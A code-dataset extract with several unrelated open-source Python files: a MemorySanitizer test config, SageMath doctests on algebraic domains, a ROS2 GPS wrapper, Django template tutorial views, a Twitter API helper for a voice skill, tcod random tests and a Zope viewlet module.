max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
test/msan/lit.cfg.py | QuarkTheAwesome/compiler-rt-be-aeabi | 118 | 9489 | # -*- Python -*-
import os
# Setup config name.
config.name = 'MemorySanitizer' + getattr(config, 'name_suffix', 'default')
# Setup source root.
config.test_source_root = os.path.dirname(__file__)
# Setup default compiler flags used with -fsanitize=memory option.
clang_msan_cflags = (["-fsanitize=memory",
"-mno-omit-leaf-frame-pointer",
"-fno-omit-frame-pointer",
"-fno-optimize-sibling-calls"] +
[config.target_cflags] +
config.debug_info_flags)
# Some Msan tests leverage backtrace() which requires libexecinfo on FreeBSD.
if config.host_os == 'FreeBSD':
clang_msan_cflags += ["-lexecinfo", "-fPIC"]
clang_msan_cxxflags = config.cxx_mode_flags + clang_msan_cflags
# Flags for KMSAN invocation. This is C-only, we're not interested in C++.
clang_kmsan_cflags = (["-fsanitize=kernel-memory"] +
[config.target_cflags] +
config.debug_info_flags)
def build_invocation(compile_flags):
return " " + " ".join([config.clang] + compile_flags) + " "
config.substitutions.append( ("%clang_msan ", build_invocation(clang_msan_cflags)) )
config.substitutions.append( ("%clangxx_msan ", build_invocation(clang_msan_cxxflags)) )
config.substitutions.append( ("%clang_kmsan ", build_invocation(clang_kmsan_cflags)) )
# Default test suffixes.
config.suffixes = ['.c', '.cc', '.cpp']
if config.host_os not in ['Linux', 'NetBSD', 'FreeBSD']:
config.unsupported = True
# For mips64, mips64el we have forced store_context_size to 1 because these
# archs use slow unwinder which is not async signal safe. Therefore we only
# check the first frame since store_context size is 1.
if config.host_arch in ['mips64', 'mips64el']:
config.substitutions.append( ('CHECK-%short-stack', 'CHECK-SHORT-STACK'))
else:
config.substitutions.append( ('CHECK-%short-stack', 'CHECK-FULL-STACK'))
|
src/sage/tests/books/computational-mathematics-with-sagemath/domaines_doctest.py | hsm207/sage | 1,742 | 9498 | <filename>src/sage/tests/books/computational-mathematics-with-sagemath/domaines_doctest.py<gh_stars>1000+
## -*- encoding: utf-8 -*-
"""
This file (./domaines_doctest.sage) was *autogenerated* from ./domaines.tex,
with sagetex.sty version 2011/05/27 v2.3.1.
It contains the contents of all the sageexample environments from this file.
You should be able to doctest this file with:
sage -t ./domaines_doctest.sage
It is always safe to delete this file; it is not used in typesetting your
document.
Sage example in ./domaines.tex, line 10::
sage: x = var('x')
Sage example in ./domaines.tex, line 69::
sage: o = 12/35
sage: type(o)
<... 'sage.rings.rational.Rational'>
Sage example in ./domaines.tex, line 82::
sage: type(12/35)
<... 'sage.rings.rational.Rational'>
Sage example in ./domaines.tex, line 131::
sage: o = 720
sage: o.factor()
2^4 * 3^2 * 5
Sage example in ./domaines.tex, line 142::
sage: type(o).factor(o)
2^4 * 3^2 * 5
Sage example in ./domaines.tex, line 157::
sage: 720.factor()
2^4 * 3^2 * 5
Sage example in ./domaines.tex, line 166::
sage: o = 720 / 133
sage: o.numerator().factor()
2^4 * 3^2 * 5
Sage example in ./domaines.tex, line 253::
sage: 3 * 7
21
Sage example in ./domaines.tex, line 261::
sage: (2/3) * (6/5)
4/5
Sage example in ./domaines.tex, line 267::
sage: (1 + I) * (1 - I)
2
Sage example in ./domaines.tex, line 274::
sage: (x + 2) * (x + 1)
(x + 2)*(x + 1)
sage: (x + 1) * (x + 2)
(x + 2)*(x + 1)
Sage example in ./domaines.tex, line 308::
sage: def fourth_power(a):
....: a = a * a
....: a = a * a
....: return a
Sage example in ./domaines.tex, line 330::
sage: fourth_power(2)
16
sage: fourth_power(3/2)
81/16
sage: fourth_power(I)
1
sage: fourth_power(x+1)
(x + 1)^4
sage: M = matrix([[0,-1],[1,0]]); M
[ 0 -1]
[ 1 0]
sage: fourth_power(M)
[1 0]
[0 1]
Sage example in ./domaines.tex, line 375::
sage: t = type(5/1); t
<... 'sage.rings.rational.Rational'>
sage: t == type(5)
False
Sage example in ./domaines.tex, line 476::
sage: a = 5; a
5
sage: a.is_unit()
False
Sage example in ./domaines.tex, line 484::
sage: a = 5/1; a
5
sage: a.is_unit()
True
Sage example in ./domaines.tex, line 507::
sage: parent(5)
Integer Ring
sage: parent(5/1)
Rational Field
Sage example in ./domaines.tex, line 515::
sage: ZZ
Integer Ring
sage: QQ
Rational Field
Sage example in ./domaines.tex, line 525::
sage: QQ(5).parent()
Rational Field
sage: ZZ(5/1).parent()
Integer Ring
sage: ZZ(1/5)
Traceback (most recent call last):
...
TypeError: no conversion of this rational to integer
Sage example in ./domaines.tex, line 543::
sage: ZZ(1), QQ(1), RR(1), CC(1)
(1, 1, 1.00000000000000, 1.00000000000000)
Sage example in ./domaines.tex, line 568::
sage: cartesian_product([QQ, QQ])
The Cartesian product of (Rational Field, Rational Field)
Sage example in ./domaines.tex, line 574::
sage: ZZ.fraction_field()
Rational Field
Sage example in ./domaines.tex, line 580::
sage: ZZ['x']
Univariate Polynomial Ring in x over Integer Ring
Sage example in ./domaines.tex, line 591::
sage: Z5 = GF(5); Z5
Finite Field of size 5
sage: P = Z5['x']; P
Univariate Polynomial Ring in x over Finite Field of size 5
sage: M = MatrixSpace(P, 3, 3); M
Full MatrixSpace of 3 by 3 dense matrices over
Univariate Polynomial Ring in x over Finite Field of size 5
Sage example in ./domaines.tex, line 602::
sage: M.random_element() # random
[2*x^2 + 3*x + 4 4*x^2 + 2*x + 2 4*x^2 + 2*x]
[ 3*x 2*x^2 + x + 3 3*x^2 + 4*x]
[ 4*x^2 + 3 3*x^2 + 2*x + 4 2*x + 4]
Sage example in ./domaines.tex, line 697::
sage: QQ.category()
Join of Category of number fields and Category of quotient fields and Category of metric spaces
Sage example in ./domaines.tex, line 704::
sage: QQ in Fields()
True
Sage example in ./domaines.tex, line 712::
sage: QQ in CommutativeAdditiveGroups()
True
Sage example in ./domaines.tex, line 718::
sage: QQ['x'] in EuclideanDomains()
True
Sage example in ./domaines.tex, line 859::
sage: 5.parent()
Integer Ring
Sage example in ./domaines.tex, line 872::
sage: type(factor(4))
<class 'sage.structure.factorization_integer.IntegerFactorization'>
Sage example in ./domaines.tex, line 895::
sage: int(5)
5
sage: type(int(5))
<... 'int'>
Sage example in ./domaines.tex, line 909::
sage: Integer(5)
5
sage: type(Integer(5))
<... 'sage.rings.integer.Integer'>
Sage example in ./domaines.tex, line 926::
sage: factorial(99) / factorial(100) - 1 / 50
-1/100
Sage example in ./domaines.tex, line 974::
sage: 72/53 - 5/3 * 2.7
-3.14150943396227
Sage example in ./domaines.tex, line 982::
sage: cos(1), cos(1.)
(cos(1), 0.540302305868140)
Sage example in ./domaines.tex, line 1000::
sage: pi.n(digits=50) # variant: n(pi,digits=50)
3.1415926535897932384626433832795028841971693993751
Sage example in ./domaines.tex, line 1020::
sage: z = CC(1,2); z.arg()
1.10714871779409
Sage example in ./domaines.tex, line 1036::
sage: I.parent()
Number Field in I with defining polynomial x^2 + 1 with I = 1*I
Sage example in ./domaines.tex, line 1043::
sage: (1.+2.*I).parent()
Complex Field with 53 bits of precision
sage: (1.+2.*SR(I)).parent()
Symbolic Ring
Sage example in ./domaines.tex, line 1064::
sage: z = 3 * exp(I*pi/4)
sage: z.real(), z.imag(), z.abs().canonicalize_radical()
(3/2*sqrt(2), 3/2*sqrt(2), 3)
Sage example in ./domaines.tex, line 1094::
sage: a, b, c = 0, 2, 3
sage: a == 1 or (b == 2 and c == 3)
True
Sage example in ./domaines.tex, line 1147::
sage: x, y = var('x, y')
sage: bool( (x-y)*(x+y) == x^2-y^2 )
True
Sage example in ./domaines.tex, line 1171::
sage: Z4 = IntegerModRing(4); Z4
Ring of integers modulo 4
sage: m = Z4(7); m
3
Sage example in ./domaines.tex, line 1184::
sage: 3 * m + 1
2
Sage example in ./domaines.tex, line 1191::
sage: Z3 = GF(3); Z3
Finite Field of size 3
Sage example in ./domaines.tex, line 1243::
sage: a = matrix(QQ, [[1,2,3],[2,4,8],[3,9,27]])
sage: (a^2 + 1) * a^(-1)
[ -5 13/2 7/3]
[ 7 1 25/3]
[ 2 19/2 27]
Sage example in ./domaines.tex, line 1259::
sage: M = MatrixSpace(QQ,3,3); M
Full MatrixSpace of 3 by 3 dense matrices over Rational Field
sage: a = M([[1,2,3],[2,4,8],[3,9,27]])
sage: (a^2 + 1) * a^(-1)
[ -5 13/2 7/3]
[ 7 1 25/3]
[ 2 19/2 27]
Sage example in ./domaines.tex, line 1283::
sage: P = ZZ['x']; P
Univariate Polynomial Ring in x over Integer Ring
sage: F = P.fraction_field(); F
Fraction Field of Univariate Polynomial Ring in x over Integer Ring
sage: p = P(x+1) * P(x); p
x^2 + x
sage: p + 1/p
(x^4 + 2*x^3 + x^2 + 1)/(x^2 + x)
sage: parent(p + 1/p)
Fraction Field of Univariate Polynomial Ring in x over Integer Ring
Sage example in ./domaines.tex, line 1382::
sage: k.<a> = NumberField(x^3 + x + 1); a^3; a^4+3*a
-a - 1
-a^2 + 2*a
Sage example in ./domaines.tex, line 1416::
sage: parent(sin(x))
Symbolic Ring
Sage example in ./domaines.tex, line 1422::
sage: SR
Symbolic Ring
Sage example in ./domaines.tex, line 1428::
sage: SR.category()
Category of fields
Sage example in ./domaines.tex, line 1482::
sage: R = QQ['x1,x2,x3,x4']; R
Multivariate Polynomial Ring in x1, x2, x3, x4 over Rational Field
sage: x1, x2, x3, x4 = R.gens()
Sage example in ./domaines.tex, line 1489::
sage: x1 * (x2 - x3)
x1*x2 - x1*x3
Sage example in ./domaines.tex, line 1496::
sage: (x1+x2)*(x1-x2) - (x1^2 - x2^2)
0
Sage example in ./domaines.tex, line 1509::
sage: P = prod( (a-b) for (a,b) in Subsets([x1,x2,x3,x4],2) ); P * P.lc()
x1^3*x2^2*x3 - x1^2*x2^3*x3 - x1^3*x2*x3^2 + x1*x2^3*x3^2
+ x1^2*x2*x3^3 - x1*x2^2*x3^3 - x1^3*x2^2*x4 + x1^2*x2^3*x4
+ x1^3*x3^2*x4 - x2^3*x3^2*x4 - x1^2*x3^3*x4 + x2^2*x3^3*x4
+ x1^3*x2*x4^2 - x1*x2^3*x4^2 - x1^3*x3*x4^2 + x2^3*x3*x4^2
+ x1*x3^3*x4^2 - x2*x3^3*x4^2 - x1^2*x2*x4^3 + x1*x2^2*x4^3
+ x1^2*x3*x4^3 - x2^2*x3*x4^3 - x1*x3^2*x4^3 + x2*x3^2*x4^3
Sage example in ./domaines.tex, line 1531::
sage: x1, x2, x3, x4 = SR.var('x1, x2, x3, x4')
sage: got = prod( (a-b) for (a,b) in Subsets([x1,x2,x3,x4],2) )
sage: expected1 = -(x1 - x2)*(x1 - x3)*(x1 - x4)*(x2 - x3)*(x2 - x4)*(x3 - x4)
sage: expected2 = (x1 - x2)*(x1 - x3)*(x1 - x4)*(x2 - x3)*(x2 - x4)*(x3 - x4)
sage: bool(got == expected1 or got == expected2)
True
Sage example in ./domaines.tex, line 1581::
sage: x = var('x')
sage: p = 54*x^4+36*x^3-102*x^2-72*x-12
sage: factor(p)
6*(x^2 - 2)*(3*x + 1)^2
Sage example in ./domaines.tex, line 1616::
sage: R = ZZ['x']; R
Univariate Polynomial Ring in x over Integer Ring
Sage example in ./domaines.tex, line 1622::
sage: q = R(p); q
54*x^4 + 36*x^3 - 102*x^2 - 72*x - 12
Sage example in ./domaines.tex, line 1629::
sage: parent(q)
Univariate Polynomial Ring in x over Integer Ring
Sage example in ./domaines.tex, line 1635::
sage: factor(q)
2 * 3 * (3*x + 1)^2 * (x^2 - 2)
Sage example in ./domaines.tex, line 1642::
sage: R = QQ['x']; R
Univariate Polynomial Ring in x over Rational Field
sage: q = R(p); q
54*x^4 + 36*x^3 - 102*x^2 - 72*x - 12
sage: factor(q)
(54) * (x + 1/3)^2 * (x^2 - 2)
Sage example in ./domaines.tex, line 1665::
sage: R = ComplexField(16)['x']; R
Univariate Polynomial Ring in x over Complex Field
with 16 bits of precision
sage: q = R(p); q
54.00*x^4 + 36.00*x^3 - 102.0*x^2 - 72.00*x - 12.00
sage: factor(q)
(54.00) * (x - 1.414) * (x + 0.3333)^2 * (x + 1.414)
Sage example in ./domaines.tex, line 1685::
sage: R = QQ[sqrt(2)]['x']; R
Univariate Polynomial Ring in x over Number Field in sqrt2 with defining polynomial x^2 - 2 with sqrt2 = 1.414213562373095?
sage: q = R(p); q
54*x^4 + 36*x^3 - 102*x^2 - 72*x - 12
sage: factor(q)
(54) * (x - sqrt2) * (x + sqrt2) * (x + 1/3)^2
Sage example in ./domaines.tex, line 1698::
sage: R = GF(5)['x']; R
Univariate Polynomial Ring in x over Finite Field of size 5
sage: q = R(p); q
4*x^4 + x^3 + 3*x^2 + 3*x + 3
sage: factor(q)
(4) * (x + 2)^2 * (x^2 + 3)
"""
|
webots_ros2_core/webots_ros2_core/devices/gps_device.py | TaoYibo1866/webots_ros2 | 176 | 9500 | <reponame>TaoYibo1866/webots_ros2
# Copyright 1996-2021 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Webots GPS device wrapper for ROS2."""
from rclpy.qos import QoSReliabilityPolicy, qos_profile_sensor_data
from std_msgs.msg import Float32
from sensor_msgs.msg import NavSatFix, NavSatStatus
from geometry_msgs.msg import PointStamped
from .sensor_device import SensorDevice
from controller import GPS
class GpsDevice(SensorDevice):
"""
ROS2 wrapper for Webots GPS node.
Creates suitable ROS2 interface based on Webots
[GPS](https://cyberbotics.com/doc/reference/gps) node instance:
It allows the following functinalities:
- Publishes position measurements of type `sensor_msgs::NavSatFix` if WGS84
- Publishes position measurements of type `geometry_msgs::PointStamped` if LOCAL
Args:
----
node (WebotsNode): The ROS2 node.
device_key (str): Unique identifier of the device used for configuration.
wb_device (Gps): Webots node of type GPS.
Kwargs:
params (dict): Inherited from `SensorDevice` + the following::
dict: {
'timestep': int, # Publish period in ms (default 128ms)
}
"""
def __init__(self, node, device_key, wb_device, params=None):
super().__init__(node, device_key, wb_device, params)
self.__speed_publisher = None
self.__gps_publisher = None
self.__coordinate_system = self._wb_device.getCoordinateSystem()
# Exit if disabled
if self._disable:
return
# Change default timestep
self._timestep = 128
qos_sensor_reliable = qos_profile_sensor_data
qos_sensor_reliable.reliability = QoSReliabilityPolicy.RELIABLE
# Create topics
self.__speed_publisher = node.create_publisher(
Float32, self._topic_name + '/speed', qos_sensor_reliable)
if self.__coordinate_system == GPS.WGS84:
self.__gps_publisher = node.create_publisher(
NavSatFix, self._topic_name + '/gps', qos_sensor_reliable)
else:
self.__gps_publisher = node.create_publisher(
PointStamped, self._topic_name + '/gps', qos_sensor_reliable)
def step(self):
stamp = super().step()
if not stamp:
return
if self.__gps_publisher.get_subscription_count() > 0 or \
self.__speed_publisher.get_subscription_count() > 0 or \
self._always_publish:
self._wb_device.enable(self._timestep)
msg = Float32()
msg.data = self._wb_device.getSpeed()
self.__speed_publisher.publish(msg)
if self.__coordinate_system == GPS.WGS84:
msg = NavSatFix()
msg.header.stamp = stamp
msg.header.frame_id = self._frame_id
msg.latitude = self._wb_device.getValues()[0]
msg.longitude = self._wb_device.getValues()[1]
msg.altitude = self._wb_device.getValues()[2]
msg.position_covariance_type = NavSatFix.COVARIANCE_TYPE_UNKNOWN
msg.status.service = NavSatStatus.SERVICE_GPS
self.__gps_publisher.publish(msg)
else:
msg = PointStamped()
msg.header.stamp = stamp
msg.header.frame_id = self._frame_id
msg.point.x = self._wb_device.getValues()[0]
msg.point.y = self._wb_device.getValues()[1]
msg.point.z = self._wb_device.getValues()[2]
self.__gps_publisher.publish(msg)
else:
self._wb_device.disable()
|
courses/backend/django-for-everybody/Web Application Technologies and Django/resources/dj4e-samples/tmpl/views.py | Nahid-Hassan/fullstack-software-development | 297 | 9505 | <filename>courses/backend/django-for-everybody/Web Application Technologies and Django/resources/dj4e-samples/tmpl/views.py
from django.shortcuts import render
from django.views import View
# Create your views here.
def simple(request):
return render(request, 'tmpl/simple.html')
def guess(request) :
context = {'zap' : '42' }
return render(request, 'tmpl/guess.html', context)
def special(request) :
context = {'txt' : '<b>bold</b>',
'zap' : '42' }
return render(request, 'tmpl/special.html', context)
def loop(request) :
f = ['Apple', 'Orange', 'Banana', 'Lychee']
n = ['peanut', 'cashew']
x = {'fruits' : f, 'nuts' : n, 'zap' : '42' }
return render(request, 'tmpl/loop.html', x)
def cond(request) :
x = {'guess' : '42' }
return render(request, 'tmpl/cond.html', x)
def nested(request) :
x = {'outer' : { 'inner' : '42' } }
return render(request, 'tmpl/nested.html', x)
# Call this with a parameter number
class GameView(View) :
def get(self, request, guess) :
x = {'guess' : int(guess) }
return render(request, 'tmpl/cond.html', x)
# Using inheritance (extend)
class Game2View(View) :
def get(self, request, guess) :
x = {'guess' : int(guess) }
return render(request, 'tmpl/cond2.html', x)
|
lib/twitter_utils.py | Vman45/ask-alexa-twitter | 310 | 9507 | <gh_stars>100-1000
import requests
import jsonpickle
from requests_oauthlib import OAuth1
from urllib.parse import parse_qs, urlencode
import cherrypy
from collections import defaultdict
import json
import os
import re
from collections import defaultdict
# For readable serializations
jsonpickle.set_encoder_options('json', sort_keys=True, indent=4)
class LocalCache(object):
""" Generic class for encapsulating twitter credential caching """
server_data_template = "{}.server"
user_data_template = "{0}.user.{1}"
def __init__(self, backup = "tmp/twitter.cache"):
self.backup = backup #Unique identifier for the backup of this cache
self.memcache = {
"users" : defaultdict(lambda : {}),
"server": defaultdict(lambda : {})
}
self.deserialize()
def users(self):
return self.memcache['users']
def set_user_state(self, user_id, state):
self.memcache['users'][user_id] = state
def update_user_state(self, user_id, state = {}):
self.memcache['users'][user_id].update(state)
def get_user_state(self, user_id):
return self.memcache['users'][user_id]
def clear_user_state(self, user_id):
return self.memcache['users'][user_id].clear()
def update_server_state(self, state_dict):
self.memcache['server'].update(state_dict)
def get_server_state(self):
return self.memcache['server']
def clear_server_state(self):
return self.memcache['server'].clear()
def initialize_user_queue(self, user_id, queue):
self.memcache['users'][user_id]['user_queue'] = ReadableQueue(queue)
def user_queue(self, user_id):
if 'user_queue' in self.memcache['users'][user_id]:
return self.memcache['users'][user_id]['user_queue']
def server_fname(self):
return self.server_data_template.format(self.backup)
def user_fname(self, user):
return self.user_data_template.format(self.backup, user)
def deserialize(self):
cache_loaded = False
if os.path.exists(self.server_fname()) and not os.path.isdir(self.backup):
try:
self.memcache = { "server" : {},
"users" : {} }
with open(self.server_fname()) as backupfile:
print ("Attempting to reload cache")
self.memcache['server'] = jsonpickle.decode(backupfile.read())
print ("Server cache loaded", json.dumps(self.memcache, indent=4))
for user in self.memcache['server']['user_list']:
# Try to load as much user data as possible
if os.path.exists(self.user_fname(user)):
print ("found path for user", user)
with open(self.user_fname(user)) as userfile:
user_data = jsonpickle.decode(userfile.read())
self.memcache['users'][user] = user_data
cache_loaded = True
except Exception as e:
print ("Cache file corrupted...")
raise e
if not cache_loaded:
print ("Cache could not be loaded")
pass
else:
print ("CACHE LOADED SUCCESSFULLY!")
def serialize(self):
json_to_serialize = self.memcache['server']
user_list = list(self.users().keys())
json_to_serialize.update({"user_list" : user_list})
with open(self.server_fname(), 'w') as backup_server:
# Serialize Server:
json_encoded = jsonpickle.encode(json_to_serialize)
backup_server.write(json_encoded)
for user in user_list:
user_data = self.get_user_state(user)
json_encoded = jsonpickle.encode(user_data)
with open(self.user_fname(user), 'w') as userfile:
userfile.write(json_encoded)
class ReadableQueue(object):
def __init__(self, queue=[], pos=0):
self.hashmap = { "queue" : [(i, e) for i,e in enumerate(queue)],
"pos" : pos }
return
def queue(self):
return self.hashmap['queue']
def is_empty(self):
return len(self.queue()) == 0
def is_finished(self):
return self.pos() == len(self.queue())
def pos(self):
return self.hashmap['pos']
def set_pos(self, val):
self.hashmap['pos'] = val
def get_next(self, offset=1):
if self.pos() < len(self.queue()):
temp_queue = self.queue()[self.pos(): self.pos() + offset]
self.set_pos(self.pos() + offset)
if self.pos() > len(self.queue()): self.set_pos(len(self.queue()))
return temp_queue
def read_out_next(self, offset=1):
return " ".join([readable.read_out(index) for index,readable in self.get_next(offset)])
def has_prev(self):
return self.pos() > 0
def get_prev(self, offset=1):
if self.pos() > 0:
self.set_pos(self.pos() - offset)
if self.pos() < 0:
offset = offset + self.pos()
# [1, current(2), 3] get_prev(offeset=3)
# pos :=> -2, offset :=> 3-2 = 1, pos :=> 0, then read 0 to 1
self.set_pos(0)
return self.queue()[self.pos() : offset]
return None
def read_out_prev(self, offset=1):
return " ".join([readable.read_out() for readable in self.get_prev(offset)])
#Local cache caches tokens for different users
local_cache = LocalCache()
def strip_html(text):
""" Get rid of ugly twitter html """
def reply_to(text):
replying_to = []
split_text = text.split()
for index, token in enumerate(split_text):
if token.startswith('@'): replying_to.append(token[1:])
else:
message = split_text[index:]
break
rply_msg = ""
if len(replying_to) > 0:
rply_msg = "Replying to "
for token in replying_to[:-1]: rply_msg += token+","
if len(replying_to)>1: rply_msg += 'and '
rply_msg += replying_to[-1]+". "
return rply_msg + " ".join(message)
text = reply_to(text)
text = text.replace('@', ' ')
return " ".join([token for token in text.split()
if ('http:' not in token) and ('https:' not in token)])
class Tweet(object):
def __init__(self, json_obj):
self.tweet = json_obj
def get_id(self):
return self.tweet['id']
def get_raw_text(self):
return self.tweet['text']
def _process_text(self):
text = strip_html(self.tweet['text'])
user_mentions = self.tweet['entities']['user_mentions']
text = text.replace('@', 'at ')
for user in user_mentions:
text = text.replace(user['screen_name'], user['name'])
return text
def get_screen_name(self):
return self.tweet['user']['screen_name']
def get_user_name(self):
return self.tweet['user']['name']
def read_out(self, index):
text = self._process_text()
return "tweet number {num} by {user} : {text} ,".format(num=index+1,
user=self.get_user_name(),
text = text)
def detailed_description(self):
response_builder = ["This tweet was posted by {user_name} whose twitter handle is {screen_name} the account description reads: {description}."
.format(screen_name=self.tweet['user']['screen_name'],
user_name=self.tweet['user']['name'],
description=self.tweet['user']['description'])]
if self.tweet['retweeted']:
response_builder += ["It's been retweeted {} times.".format(self.tweet['retweet_count'])]
if self.tweet['favorited']:
response_builder += ["{} people have favorited it.".format(self.tweet['favorites_count'])]
if self.tweet["in_reply_to_screen_name"]:
response_builder += ["it was posted in response to user {}.".format(self.tweet['in_reply_to_screen_name'])]
response_builder += ["the text of the tweet is, {}.".format(self._process_text())]
return " ".join(response_builder)
def user_mentions(self):
return self.tweet['user_mentions']
def get_cached_access_pair(uid):
if uid in local_cache.users():
access_token = local_cache.get_user_state(uid)['access_token']
access_secret = local_cache.get_user_state(uid)['access_secret']
return access_token, access_secret
else:
raise ValueError
def get_request_token(callback_url=None):
url = "https://api.twitter.com/oauth/request_token"
consumer_key, consumer_secret = local_cache.get_server_state()['twitter_keys']
auth = OAuth1(consumer_key, consumer_secret)
params = { "oauth_callback" : callback_url }
r = requests.post(url, auth=auth, params=params)
response_obj = parse_qs(r.text)
local_cache.update_server_state({ "request_token" : response_obj['oauth_token'][0],
"request_secret": response_obj['oauth_token_secret'][0] })
return response_obj['oauth_token_secret'], response_obj['oauth_token']
def authenticate_user_page(callback_url="", metadata=None):
url = "https://api.twitter.com/oauth/authenticate"
oauth_secret, oauth_token = get_request_token(callback_url)
local_cache.update_server_state({'metadata' : metadata })
params = { "force_login" : True,
"oauth_token": oauth_token }
r = requests.get(url, params=params)
return r.text
def post_tweet(user_id, message, additional_params={}):
"""
Helper function to post a tweet
"""
url = "https://api.twitter.com/1.1/statuses/update.json"
params = { "status" : message }
params.update(additional_params)
r = make_twitter_request(url, user_id, params, request_type='POST')
print (r.text)
return "Successfully posted a tweet {}".format(message)
def get_access_token(oauth_token, oauth_verifier):
url = "https://api.twitter.com/oauth/access_token"
params = {"oauth_verifier" : oauth_verifier}
server_state = local_cache.get_server_state()
request_token = server_state['request_token']
request_secret = server_state['request_secret']
consumer_key, consumer_secret = server_state['twitter_keys']
auth = OAuth1(consumer_key, consumer_secret, request_token, request_secret)
r = requests.post(url, params = params, auth=auth)
response_obj = parse_qs(r.text)
uid = response_obj['oauth_token'][0]
print ("Access token", uid)
local_cache.set_user_state(user_id = uid,
state = { "access_token" : response_obj['oauth_token'][0],
"access_secret" : response_obj['oauth_token_secret'][0],
'twitter_user_id': response_obj['user_id'][0],
'screen_name' : response_obj ['screen_name'][0]
})
local_cache.serialize()
fragments = {
"state" : local_cache.get_server_state()['metadata']['state'],
"access_token" : uid,
"token_type" : "Bearer"
}
return urlencode(fragments)
def get_twitter_auth(user_id):
consumer_key, consumer_secret = local_cache.get_server_state()['twitter_keys']
access_token, access_secret = get_cached_access_pair(user_id)
return OAuth1(consumer_key, consumer_secret, access_token, access_secret)
def process_tweets(tweet_list):
""" Clean tweets and enumerate, preserving only things that we are interested in """
return [Tweet(tweet) for tweet in tweet_list]
def make_twitter_request(url, user_id, params={}, request_type='GET'):
""" Generically make a request to twitter API using a particular user's authorization """
if request_type == "GET":
return requests.get(url, auth=get_twitter_auth(user_id), params=params)
elif request_type == "POST":
return requests.post(url, auth=get_twitter_auth(user_id), params=params)
def get_user_twitter_details(user_id, params={}):
url = "https://api.twitter.com/1.1/users/lookup.json"
user_cache = local_cache.get_user_state(user_id)
params.update({"user_id": user_cache['twitter_user_id'] })
response = make_twitter_request(url, user_id, params)
return response.json()
def geo_search(user_id, search_location):
"""
Search for a location - free form
"""
url = "https://api.twitter.com/1.1/geo/search.json"
params = {"query" : search_location }
response = make_twitter_request(url, user_id, params).json()
return response
def closest_trend_search(user_id, params={}):
#url = "https://api.twitter.com/1.1/trends/place.json"
url = "https://api.twitter.com/1.1/trends/closest.json"
response = make_twitter_request(url, user_id, params).json()
return response
def list_trends(user_id, woe_id):
url = "https://api.twitter.com/1.1/trends/place.json"
params = { "id" : woe_id }
response = make_twitter_request(url, user_id, params).json()
return response
def read_out_tweets(processed_tweets, speech_convertor=None):
"""
Input - list of processed 'Tweets'
output - list of spoken responses
"""
return ["tweet number {num} by {user}. {text}.".format(num=index+1, user=user, text=text)
for index, (user, text) in enumerate(processed_tweets)]
def request_tweet_list(url, user_id, params={}):
return process_tweets(make_twitter_request(url, user_id).json())
def get_home_tweets(user_id, input_params={}):
url = "https://api.twitter.com/1.1/statuses/home_timeline.json"
print ("Trying to get home tweets")
response = request_tweet_list(url, user_id)
return response
def get_retweets_of_me(user_id, input_params={}):
""" returns recently retweeted tweets """
url = "https://api.twitter.com/1.1/statuses/retweets_of_me.json"
print ("trying to get retweets")
return request_tweet_list(url, user_id)
def get_my_favourite_tweets(user_id, input_params = {}):
""" Returns a user's favourite tweets """
url = "https://api.twitter.com/1.1/favorites/list.json"
return request_tweet_list(url, user_id)
def get_user_latest_tweets(user_id, params={}):
url = "https://api.twitter.com/1.1/statuses/user_timeline.json?"
return request_tweet_list(url, user_id, params)
def get_latest_twitter_mentions(user_id):
url = "https://api.twitter.com/1.1/statuses/mentions_timeline.json"
return request_tweet_list(url, user_id)
def search_for_tweets_about(user_id, params):
""" Search twitter API """
url = "https://api.twitter.com/1.1/search/tweets.json"
response = make_twitter_request(url, user_id, params)
return process_tweets(response.json()["statuses"])
|
tests/test_random.py | hirnimeshrampuresoftware/python-tcod | 231 | 9515 | <filename>tests/test_random.py<gh_stars>100-1000
import copy
import pickle
import tcod
def test_tcod_random() -> None:
rand = tcod.random.Random(tcod.random.COMPLEMENTARY_MULTIPLY_WITH_CARRY)
assert 0 <= rand.randint(0, 100) <= 100
assert 0 <= rand.uniform(0, 100) <= 100
rand.guass(0, 1)
rand.inverse_guass(0, 1)
def test_tcod_random_copy() -> None:
rand = tcod.random.Random(tcod.random.MERSENNE_TWISTER)
rand2 = copy.copy(rand)
assert rand.uniform(0, 1) == rand2.uniform(0, 1)
assert rand.uniform(0, 1) == rand2.uniform(0, 1)
assert rand.uniform(0, 1) == rand2.uniform(0, 1)
def test_tcod_random_pickle() -> None:
rand = tcod.random.Random(tcod.random.MERSENNE_TWISTER)
rand2 = pickle.loads(pickle.dumps(rand))
assert rand.uniform(0, 1) == rand2.uniform(0, 1)
assert rand.uniform(0, 1) == rand2.uniform(0, 1)
assert rand.uniform(0, 1) == rand2.uniform(0, 1)
|
src/Products/Five/viewlet/viewlet.py | rbanffy/Zope | 289 | 9516 | ##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Viewlet.
"""
import os
import zope.viewlet.viewlet
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
class ViewletBase(zope.viewlet.viewlet.ViewletBase):
pass
class SimpleAttributeViewlet(zope.viewlet.viewlet.SimpleAttributeViewlet):
pass
class simple(zope.viewlet.viewlet.simple):
# We need to ensure that the proper __init__ is called.
__init__ = ViewletBase.__init__
def SimpleViewletClass(template, bases=(), attributes=None, name=''):
"""A function that can be used to generate a viewlet from a set of
information.
"""
# Create the base class hierarchy
bases += (simple, ViewletBase)
attrs = {'index': ViewPageTemplateFile(template),
'__name__': name}
if attributes:
attrs.update(attributes)
# Generate a derived view class.
class_ = type("SimpleViewletClass from %s" % template, bases, attrs)
return class_
